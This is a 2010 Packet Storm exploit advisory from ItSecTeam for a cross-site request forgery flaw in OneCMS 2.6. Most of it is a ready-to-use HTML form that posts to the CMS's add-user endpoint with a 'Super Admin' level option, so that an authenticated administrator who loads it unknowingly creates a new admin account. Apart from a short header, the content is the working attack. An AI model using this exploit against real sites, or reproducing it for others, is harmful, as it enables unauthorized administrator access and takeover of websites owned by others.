OneCMS 2.6 Cross Site Request Forgery

2010-03-30T00:00:00
ID PACKETSTORM:87765
Type packetstorm
Reporter ItSecTeam
Modified 2010-03-30T00:00:00

Description

                                        
                                            `  
( #Topic : OneCMS_v2.6 2010-03-25  
( #Bug type : remote add admin user exploit  
( #Download : http://sourceforge.net/projects/onecms/files/onecms/v2.6/OneCMS_v2.6.zip/download  
  
===========================================================================  
( #Author : ItSecTeam  
( #Email : Bug@ITSecTeam.com  
( #Website: http://www.itsecteam.com  
( #Forum : http://forum.ITSecTeam.com  
( #Original Advisory : www.ITSecTeam.com/en/vulnerabilities/vulnerability29.htm  
( #coded by ahmadbady  
( #Special Tnx : PLATEN , 0xd41684c654 , b3hz4d , Pejvak , Cdef3nder , mijax , r3dm0v3 , M3hr@n.S And All Team Members!  
  
  
---------------------------------------------------------------------  
exploit:  
  
<html>  
<head>  
<body>  
<form action='users.php?load=users&view=add2' method='post'>  
<table cellspacing="0" cellpadding="3" border="0" align="left">  
<tr><td>Username</td><td><input type="text" name='name'></td></tr>  
<tr><td>Password</td><td><input type="password" name='password1'></td>  
</tr><tr><td>E-Mail</td><td><input type="text" name='email'></td></tr><tr>  
<td>User Level</td><td><select name='level' multiple size='5'>  
<option value="Super Admin">Super Admin</option>  
<option value="Member">Member</option>  
<option value="Super Staff">Super Staff</option>  
<option value="Staff">Staff</option>  
<input type="submit" name="Add" value="Add User"></td></tr></form></table></td>  
</tr></table><tr><td width="100%" height="9"></td><tr><tr><td/>  
</body>  
</html>  
---------------------------------------------------------------------  
`